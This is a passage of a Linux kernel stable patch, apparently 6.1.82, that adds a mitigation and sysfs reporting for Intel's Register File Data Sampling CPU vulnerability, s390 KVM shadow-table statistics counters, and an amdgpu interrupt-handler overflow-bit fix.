++			Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst
++
+ 	driver_async_probe=  [KNL]
+ 			List of driver names to be probed asynchronously. *
+ 			matches with all driver names. If * is specified, the
+@@ -3262,6 +3282,7 @@
+ 					       nospectre_bhb [ARM64]
+ 					       nospectre_v1 [X86,PPC]
+ 					       nospectre_v2 [X86,PPC,S390,ARM64]
++					       reg_file_data_sampling=off [X86]
+ 					       retbleed=off [X86]
+ 					       spec_store_bypass_disable=off [X86,PPC]
+ 					       spectre_v2_user=off [X86]
+diff --git a/Makefile b/Makefile
+index e13df565a1cb6..c5345f3ebed0d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 81
++SUBLEVEL = 82
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/s390/include/asm/kvm_host.h b/arch/s390/include/asm/kvm_host.h
+index b1e98a9ed152b..09abf000359f8 100644
+--- a/arch/s390/include/asm/kvm_host.h
++++ b/arch/s390/include/asm/kvm_host.h
+@@ -777,6 +777,13 @@ struct kvm_vm_stat {
+ 	u64 inject_service_signal;
+ 	u64 inject_virtio;
+ 	u64 aen_forward;
++	u64 gmap_shadow_create;
++	u64 gmap_shadow_reuse;
++	u64 gmap_shadow_r1_entry;
++	u64 gmap_shadow_r2_entry;
++	u64 gmap_shadow_r3_entry;
++	u64 gmap_shadow_sg_entry;
++	u64 gmap_shadow_pg_entry;
+ };
+ 
+ struct kvm_arch_memory_slot {
+diff --git a/arch/s390/kvm/gaccess.c b/arch/s390/kvm/gaccess.c
+index 0243b6e38d364..3beceff5f1c09 100644
+--- a/arch/s390/kvm/gaccess.c
++++ b/arch/s390/kvm/gaccess.c
+@@ -1273,6 +1273,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 				  unsigned long *pgt, int *dat_protection,
+ 				  int *fake)
+ {
++	struct kvm *kvm;
+ 	struct gmap *parent;
+ 	union asce asce;
+ 	union vaddress vaddr;
+@@ -1281,6 +1282,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 
+ 	*fake = 0;
+ 	*dat_protection = 0;
++	kvm = sg->private;
+ 	parent = sg->parent;
+ 	vaddr.addr = saddr;
+ 	asce.val = sg->orig_asce;
+@@ -1341,6 +1343,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_r2t(sg, saddr, rfte.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_r1_entry++;
+ 	}
+ 		fallthrough;
+ 	case ASCE_TYPE_REGION2: {
+@@ -1369,6 +1372,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_r3t(sg, saddr, rste.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_r2_entry++;
+ 	}
+ 		fallthrough;
+ 	case ASCE_TYPE_REGION3: {
+@@ -1406,6 +1410,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_sgt(sg, saddr, rtte.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_r3_entry++;
+ 	}
+ 		fallthrough;
+ 	case ASCE_TYPE_SEGMENT: {
+@@ -1439,6 +1444,7 @@ static int kvm_s390_shadow_tables(struct gmap *sg, unsigned long saddr,
+ 		rc = gmap_shadow_pgt(sg, saddr, ste.val, *fake);
+ 		if (rc)
+ 			return rc;
++		kvm->stat.gmap_shadow_sg_entry++;
+ 	}
+ 	}
+ 	/* Return the parent address of the page table */
+@@ -1509,6 +1515,7 @@ int kvm_s390_shadow_fault(struct kvm_vcpu *vcpu, struct gmap *sg,
+ 	pte.p |= dat_protection;
+ 	if (!rc)
+ 		rc = gmap_shadow_page(sg, saddr, __pte(pte.val));
++	vcpu->kvm->stat.gmap_shadow_pg_entry++;
+ 	ipte_unlock(vcpu->kvm);
+ 	mmap_read_unlock(sg->mm);
+ 	return rc;
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index f604946ab2c85..348d49268a7ec 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -66,7 +66,14 @@ const struct _kvm_stats_desc kvm_vm_stats_desc[] = {
+ 	STATS_DESC_COUNTER(VM, inject_pfault_done),
+ 	STATS_DESC_COUNTER(VM, inject_service_signal),
+ 	STATS_DESC_COUNTER(VM, inject_virtio),
+-	STATS_DESC_COUNTER(VM, aen_forward)
++	STATS_DESC_COUNTER(VM, aen_forward),
++	STATS_DESC_COUNTER(VM, gmap_shadow_reuse),
++	STATS_DESC_COUNTER(VM, gmap_shadow_create),
++	STATS_DESC_COUNTER(VM, gmap_shadow_r1_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_r2_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_r3_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_sg_entry),
++	STATS_DESC_COUNTER(VM, gmap_shadow_pg_entry),
+ };
+ 
+ const struct kvm_stats_header kvm_vm_stats_header = {
+diff --git a/arch/s390/kvm/vsie.c b/arch/s390/kvm/vsie.c
+index 740f8b56e63f9..d90c818a9ae71 100644
+--- a/arch/s390/kvm/vsie.c
++++ b/arch/s390/kvm/vsie.c
+@@ -1206,15 +1206,17 @@ static int acquire_gmap_shadow(struct kvm_vcpu *vcpu,
+ 	 * we're holding has been unshadowed. If the gmap is still valid,
+ 	 * we can safely reuse it.
+ 	 */
+-	if (vsie_page->gmap && gmap_shadow_valid(vsie_page->gmap, asce, edat))
++	if (vsie_page->gmap && gmap_shadow_valid(vsie_page->gmap, asce, edat)) {
++		vcpu->kvm->stat.gmap_shadow_reuse++;
+ 		return 0;
++	}
+ 
+ 	/* release the old shadow - if any, and mark the prefix as unmapped */
+ 	release_gmap_shadow(vsie_page);
+ 	gmap = gmap_shadow(vcpu->arch.gmap, asce, edat);
+ 	if (IS_ERR(gmap))
+ 		return PTR_ERR(gmap);
+-	gmap->private = vcpu->kvm;
++	vcpu->kvm->stat.gmap_shadow_create++;
+ 	WRITE_ONCE(vsie_page->gmap, gmap);
+ 	return 0;
+ }
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 243f673fa6515..662cf23a1b44b 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -1675,6 +1675,7 @@ struct gmap *gmap_shadow(struct gmap *parent, unsigned long asce,
+ 		return ERR_PTR(-ENOMEM);
+ 	new->mm = parent->mm;
+ 	new->parent = gmap_get(parent);
++	new->private = parent->private;
+ 	new->orig_asce = asce;
+ 	new->edat_level = edat_level;
+ 	new->initialized = false;
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 2f7af61b49b6c..5caa023e98397 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -2565,6 +2565,17 @@ config GDS_FORCE_MITIGATION
+ 
+ 	  If in doubt, say N.
+ 
++config MITIGATION_RFDS
++	bool "RFDS Mitigation"
++	depends on CPU_SUP_INTEL
++	default y
++	help
++	  Enable mitigation for Register File Data Sampling (RFDS) by default.
++	  RFDS is a hardware vulnerability which affects Intel Atom CPUs. It
++	  allows unprivileged speculative access to stale data previously
++	  stored in floating point, vector and integer registers.
++	  See also <file:Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst>
++
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index b60f24b30cb90..b97a70aa4de90 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -477,4 +477,5 @@
+ /* BUG word 2 */
+ #define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
+ #define X86_BUG_DIV0			X86_BUG(1*32 + 1) /* AMD DIV0 speculation bug */
++#define X86_BUG_RFDS			X86_BUG(1*32 + 2) /* CPU is vulnerable to Register File Data Sampling */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index ec955ab2ff034..005e41dc7ee5a 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -168,6 +168,14 @@
+ 						 * CPU is not vulnerable to Gather
+ 						 * Data Sampling (GDS).
+ 						 */
++#define ARCH_CAP_RFDS_NO		BIT(27)	/*
++						 * Not susceptible to Register
++						 * File Data Sampling.
++						 */
++#define ARCH_CAP_RFDS_CLEAR		BIT(28)	/*
++						 * VERW clears CPU Register
++						 * File.
++						 */
+ 
+ #define ARCH_CAP_XAPIC_DISABLE		BIT(21)	/*
+ 						 * IA32_XAPIC_DISABLE_STATUS MSR
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index d1895930e6eb8..c68789fdc123b 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -421,6 +421,13 @@ static void __init mmio_select_mitigation(void)
+ 	if (boot_cpu_has_bug(X86_BUG_MDS) || (boot_cpu_has_bug(X86_BUG_TAA) &&
+ 					      boot_cpu_has(X86_FEATURE_RTM)))
+ 		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
++
++	/*
++	 * X86_FEATURE_CLEAR_CPU_BUF could be enabled by other VERW based
++	 * mitigations, disable KVM-only mitigation in that case.
++	 */
++	if (boot_cpu_has(X86_FEATURE_CLEAR_CPU_BUF))
++		static_branch_disable(&mmio_stale_data_clear);
+ 	else
+ 		static_branch_enable(&mmio_stale_data_clear);
+ 
+@@ -472,6 +479,57 @@ static int __init mmio_stale_data_parse_cmdline(char *str)
+ }
+ early_param("mmio_stale_data", mmio_stale_data_parse_cmdline);
+ 
++#undef pr_fmt
++#define pr_fmt(fmt)	"Register File Data Sampling: " fmt
++
++enum rfds_mitigations {
++	RFDS_MITIGATION_OFF,
++	RFDS_MITIGATION_VERW,
++	RFDS_MITIGATION_UCODE_NEEDED,
++};
++
++/* Default mitigation for Register File Data Sampling */
++static enum rfds_mitigations rfds_mitigation __ro_after_init =
++	IS_ENABLED(CONFIG_MITIGATION_RFDS) ? RFDS_MITIGATION_VERW : RFDS_MITIGATION_OFF;
++
++static const char * const rfds_strings[] = {
++	[RFDS_MITIGATION_OFF]			= "Vulnerable",
++	[RFDS_MITIGATION_VERW]			= "Mitigation: Clear Register File",
++	[RFDS_MITIGATION_UCODE_NEEDED]		= "Vulnerable: No microcode",
++};
++
++static void __init rfds_select_mitigation(void)
++{
++	if (!boot_cpu_has_bug(X86_BUG_RFDS) || cpu_mitigations_off()) {
++		rfds_mitigation = RFDS_MITIGATION_OFF;
++		return;
++	}
++	if (rfds_mitigation == RFDS_MITIGATION_OFF)
++		return;
++
++	if (x86_read_arch_cap_msr() & ARCH_CAP_RFDS_CLEAR)
++		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
++	else
++		rfds_mitigation = RFDS_MITIGATION_UCODE_NEEDED;
++}
++
++static __init int rfds_parse_cmdline(char *str)
++{
++	if (!str)
++		return -EINVAL;
++
++	if (!boot_cpu_has_bug(X86_BUG_RFDS))
++		return 0;
++
++	if (!strcmp(str, "off"))
++		rfds_mitigation = RFDS_MITIGATION_OFF;
++	else if (!strcmp(str, "on"))
++		rfds_mitigation = RFDS_MITIGATION_VERW;
++
++	return 0;
++}
++early_param("reg_file_data_sampling", rfds_parse_cmdline);
++
+ #undef pr_fmt
+ #define pr_fmt(fmt)     "" fmt
+ 
+@@ -497,11 +555,19 @@ static void __init md_clear_update_mitigation(void)
+ 		taa_mitigation = TAA_MITIGATION_VERW;
+ 		taa_select_mitigation();
+ 	}
+-	if (mmio_mitigation == MMIO_MITIGATION_OFF &&
+-	    boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA)) {
++	/*
++	 * MMIO_MITIGATION_OFF is not checked here so that mmio_stale_data_clear
++	 * gets updated correctly as per X86_FEATURE_CLEAR_CPU_BUF state.
++	 */
++	if (boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA)) {
+ 		mmio_mitigation = MMIO_MITIGATION_VERW;
+ 		mmio_select_mitigation();
+ 	}
++	if (rfds_mitigation == RFDS_MITIGATION_OFF &&
++	    boot_cpu_has_bug(X86_BUG_RFDS)) {
++		rfds_mitigation = RFDS_MITIGATION_VERW;
++		rfds_select_mitigation();
++	}
+ out:
+ 	if (boot_cpu_has_bug(X86_BUG_MDS))
+ 		pr_info("MDS: %s\n", mds_strings[mds_mitigation]);
+@@ -511,6 +577,8 @@ static void __init md_clear_update_mitigation(void)
+ 		pr_info("MMIO Stale Data: %s\n", mmio_strings[mmio_mitigation]);
+ 	else if (boot_cpu_has_bug(X86_BUG_MMIO_UNKNOWN))
+ 		pr_info("MMIO Stale Data: Unknown: No mitigations\n");
++	if (boot_cpu_has_bug(X86_BUG_RFDS))
++		pr_info("Register File Data Sampling: %s\n", rfds_strings[rfds_mitigation]);
+ }
+ 
+ static void __init md_clear_select_mitigation(void)
+@@ -518,11 +586,12 @@ static void __init md_clear_select_mitigation(void)
+ 	mds_select_mitigation();
+ 	taa_select_mitigation();
+ 	mmio_select_mitigation();
++	rfds_select_mitigation();
+ 
+ 	/*
+-	 * As MDS, TAA and MMIO Stale Data mitigations are inter-related, update
+-	 * and print their mitigation after MDS, TAA and MMIO Stale Data
+-	 * mitigation selection is done.
++	 * As these mitigations are inter-related and rely on VERW instruction
++	 * to clear the microarchitectural buffers, update and print their status
++	 * after mitigation selection is done for each of these vulnerabilities.
+ 	 */
+ 	md_clear_update_mitigation();
+ }
+@@ -2586,6 +2655,11 @@ static ssize_t mmio_stale_data_show_state(char *buf)
+ 			  sched_smt_active() ? "vulnerable" : "disabled");
+ }
+ 
++static ssize_t rfds_show_state(char *buf)
++{
++	return sysfs_emit(buf, "%s\n", rfds_strings[rfds_mitigation]);
++}
++
+ static char *stibp_state(void)
+ {
+ 	if (spectre_v2_in_eibrs_mode(spectre_v2_enabled))
+@@ -2747,6 +2821,9 @@ static ssize_t cpu_show_common(struct device *dev, struct device_attribute *attr
+ 	case X86_BUG_SRSO:
+ 		return srso_show_state(buf);
+ 
++	case X86_BUG_RFDS:
++		return rfds_show_state(buf);
++
+ 	default:
+ 		break;
+ 	}
+@@ -2821,4 +2898,9 @@ ssize_t cpu_show_spec_rstack_overflow(struct device *dev, struct device_attribut
+ {
+ 	return cpu_show_common(dev, attr, buf, X86_BUG_SRSO);
+ }
++
++ssize_t cpu_show_reg_file_data_sampling(struct device *dev, struct device_attribute *attr, char *buf)
++{
++	return cpu_show_common(dev, attr, buf, X86_BUG_RFDS);
++}
+ #endif
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 454cdf3418624..758938c94b41e 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1248,6 +1248,8 @@ static const __initconst struct x86_cpu_id cpu_vuln_whitelist[] = {
+ #define SRSO		BIT(5)
+ /* CPU is affected by GDS */
+ #define GDS		BIT(6)
++/* CPU is affected by Register File Data Sampling */
++#define RFDS		BIT(7)
+ 
+ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(IVYBRIDGE,	X86_STEPPING_ANY,		SRBDS),
+@@ -1275,9 +1277,18 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(TIGERLAKE,	X86_STEPPING_ANY,		GDS),
+ 	VULNBL_INTEL_STEPPINGS(LAKEFIELD,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED),
+ 	VULNBL_INTEL_STEPPINGS(ROCKETLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+-	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
+-	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_D,	X86_STEPPING_ANY,		MMIO),
+-	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS),
++	VULNBL_INTEL_STEPPINGS(ALDERLAKE,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ALDERLAKE_L,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(RAPTORLAKE,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(RAPTORLAKE_P,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(RAPTORLAKE_S,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ALDERLAKE_N,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_D,	X86_STEPPING_ANY,		MMIO | RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_TREMONT_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_GOLDMONT,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_GOLDMONT_D,	X86_STEPPING_ANY,		RFDS),
++	VULNBL_INTEL_STEPPINGS(ATOM_GOLDMONT_PLUS, X86_STEPPING_ANY,		RFDS),
+ 
+ 	VULNBL_AMD(0x15, RETBLEED),
+ 	VULNBL_AMD(0x16, RETBLEED),
+@@ -1311,6 +1322,24 @@ static bool arch_cap_mmio_immune(u64 ia32_cap)
+ 		ia32_cap & ARCH_CAP_SBDR_SSDP_NO);
+ }
+ 
++static bool __init vulnerable_to_rfds(u64 ia32_cap)
++{
++	/* The "immunity" bit trumps everything else: */
++	if (ia32_cap & ARCH_CAP_RFDS_NO)
++		return false;
++
++	/*
++	 * VMMs set ARCH_CAP_RFDS_CLEAR for processors not in the blacklist to
++	 * indicate that mitigation is needed because guest is running on a
++	 * vulnerable hardware or may migrate to such hardware:
++	 */
++	if (ia32_cap & ARCH_CAP_RFDS_CLEAR)
++		return true;
++
++	/* Only consult the blacklist when there is no enumeration: */
++	return cpu_matches(cpu_vuln_blacklist, RFDS);
++}
++
+ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ {
+ 	u64 ia32_cap = x86_read_arch_cap_msr();
+@@ -1419,6 +1448,9 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 			setup_force_cpu_bug(X86_BUG_SRSO);
+ 	}
+ 
++	if (vulnerable_to_rfds(ia32_cap))
++		setup_force_cpu_bug(X86_BUG_RFDS);
++
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_MELTDOWN))
+ 		return;
+ 
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 7144e51668136..688bc7b72eb66 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -1613,7 +1613,8 @@ static unsigned int num_msr_based_features;
+ 	 ARCH_CAP_SKIP_VMENTRY_L1DFLUSH | ARCH_CAP_SSB_NO | ARCH_CAP_MDS_NO | \
+ 	 ARCH_CAP_PSCHANGE_MC_NO | ARCH_CAP_TSX_CTRL_MSR | ARCH_CAP_TAA_NO | \
+ 	 ARCH_CAP_SBDR_SSDP_NO | ARCH_CAP_FBSDP_NO | ARCH_CAP_PSDP_NO | \
+-	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO)
++	 ARCH_CAP_FB_CLEAR | ARCH_CAP_RRSBA | ARCH_CAP_PBRSB_NO | ARCH_CAP_GDS_NO | \
++	 ARCH_CAP_RFDS_NO | ARCH_CAP_RFDS_CLEAR)
+ 
+ static u64 kvm_get_arch_capabilities(void)
+ {
+@@ -1650,6 +1651,8 @@ static u64 kvm_get_arch_capabilities(void)
+ 		data |= ARCH_CAP_SSB_NO;
+ 	if (!boot_cpu_has_bug(X86_BUG_MDS))
+ 		data |= ARCH_CAP_MDS_NO;
++	if (!boot_cpu_has_bug(X86_BUG_RFDS))
++		data |= ARCH_CAP_RFDS_NO;
+ 
+ 	if (!boot_cpu_has(X86_FEATURE_RTM)) {
+ 		/*
+diff --git a/drivers/base/cpu.c b/drivers/base/cpu.c
+index dab70a65377c8..31da94afe4f3d 100644
+--- a/drivers/base/cpu.c
++++ b/drivers/base/cpu.c
+@@ -589,6 +589,12 @@ ssize_t __weak cpu_show_spec_rstack_overflow(struct device *dev,
+ 	return sysfs_emit(buf, "Not affected\n");
+ }
+ 
++ssize_t __weak cpu_show_reg_file_data_sampling(struct device *dev,
++					       struct device_attribute *attr, char *buf)
++{
++	return sysfs_emit(buf, "Not affected\n");
++}
++
+ static DEVICE_ATTR(meltdown, 0444, cpu_show_meltdown, NULL);
+ static DEVICE_ATTR(spectre_v1, 0444, cpu_show_spectre_v1, NULL);
+ static DEVICE_ATTR(spectre_v2, 0444, cpu_show_spectre_v2, NULL);
+@@ -602,6 +608,7 @@ static DEVICE_ATTR(mmio_stale_data, 0444, cpu_show_mmio_stale_data, NULL);
+ static DEVICE_ATTR(retbleed, 0444, cpu_show_retbleed, NULL);
+ static DEVICE_ATTR(gather_data_sampling, 0444, cpu_show_gds, NULL);
+ static DEVICE_ATTR(spec_rstack_overflow, 0444, cpu_show_spec_rstack_overflow, NULL);
++static DEVICE_ATTR(reg_file_data_sampling, 0444, cpu_show_reg_file_data_sampling, NULL);
+ 
+ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_meltdown.attr,
+@@ -617,6 +624,7 @@ static struct attribute *cpu_root_vulnerabilities_attrs[] = {
+ 	&dev_attr_retbleed.attr,
+ 	&dev_attr_gather_data_sampling.attr,
+ 	&dev_attr_spec_rstack_overflow.attr,
++	&dev_attr_reg_file_data_sampling.attr,
+ 	NULL
+ };
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/cik_ih.c b/drivers/gpu/drm/amd/amdgpu/cik_ih.c
+index df385ffc97683..6578ca1b90afa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/cik_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/cik_ih.c
+@@ -204,6 +204,12 @@ static u32 cik_ih_get_wptr(struct amdgpu_device *adev,
+ 		tmp = RREG32(mmIH_RB_CNTL);
+ 		tmp |= IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
+ 		WREG32(mmIH_RB_CNTL, tmp);
++
++		/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++		 * can be detected.
++		 */
++		tmp &= ~IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
++		WREG32(mmIH_RB_CNTL, tmp);
+ 	}
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/cz_ih.c b/drivers/gpu/drm/amd/amdgpu/cz_ih.c
+index b8c47e0cf37ad..c19681492efa7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/cz_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/cz_ih.c
+@@ -216,6 +216,11 @@ static u32 cz_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32(mmIH_RB_CNTL, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32(mmIH_RB_CNTL, tmp);
+ 
+ out:
+ 	return (wptr & ih->ptr_mask);
+diff --git a/drivers/gpu/drm/amd/amdgpu/iceland_ih.c b/drivers/gpu/drm/amd/amdgpu/iceland_ih.c
+index aecad530b10a6..2c02ae69883d2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/iceland_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/iceland_ih.c
+@@ -215,6 +215,11 @@ static u32 iceland_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32(mmIH_RB_CNTL, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32(mmIH_RB_CNTL, tmp);
+ 
+ out:
+ 	return (wptr & ih->ptr_mask);
+diff --git a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+index 7cd79a3844b24..657e4ca6f9dd2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/ih_v6_0.c
+@@ -417,6 +417,12 @@ static u32 ih_v6_0_get_wptr(struct amdgpu_device *adev,
+ 	tmp = RREG32_NO_KIQ(ih_regs->ih_rb_cntl);
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/navi10_ih.c b/drivers/gpu/drm/amd/amdgpu/navi10_ih.c
+index eec13cb5bf758..84e8e8b008ef6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/navi10_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/navi10_ih.c
+@@ -442,6 +442,12 @@ static u32 navi10_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = RREG32_NO_KIQ(ih_regs->ih_rb_cntl);
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
++
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/si_ih.c b/drivers/gpu/drm/amd/amdgpu/si_ih.c
+index 9a24f17a57502..cada9f300a7f5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/si_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/si_ih.c
+@@ -119,6 +119,12 @@ static u32 si_ih_get_wptr(struct amdgpu_device *adev,
+ 		tmp = RREG32(IH_RB_CNTL);
+ 		tmp |= IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
+ 		WREG32(IH_RB_CNTL, tmp);
++
++		/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++		 * can be detected.
++		 */
++		tmp &= ~IH_RB_CNTL__WPTR_OVERFLOW_CLEAR_MASK;
++		WREG32(IH_RB_CNTL, tmp);
+ 	}
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/tonga_ih.c b/drivers/gpu/drm/amd/amdgpu/tonga_ih.c
+index b08905d1c00f0..07a5d95be07f5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/tonga_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/tonga_ih.c
+@@ -219,6 +219,12 @@ static u32 tonga_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32(mmIH_RB_CNTL, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
++	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 0);
++	WREG32(mmIH_RB_CNTL, tmp);
++
+ out:
+ 	return (wptr & ih->ptr_mask);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/vega10_ih.c b/drivers/gpu/drm/amd/amdgpu/vega10_ih.c
+index 1e83db0c5438d..74c94df423455 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vega10_ih.c
++++ b/drivers/gpu/drm/amd/amdgpu/vega10_ih.c
+@@ -373,6 +373,12 @@ static u32 vega10_ih_get_wptr(struct amdgpu_device *adev,
+ 	tmp = REG_SET_FIELD(tmp, IH_RB_CNTL, WPTR_OVERFLOW_CLEAR, 1);
+ 	WREG32_NO_KIQ(ih_regs->ih_rb_cntl, tmp);
+ 
++	/* Unset the CLEAR_OVERFLOW bit immediately so new overflows
++	 * can be detected.
++	 */
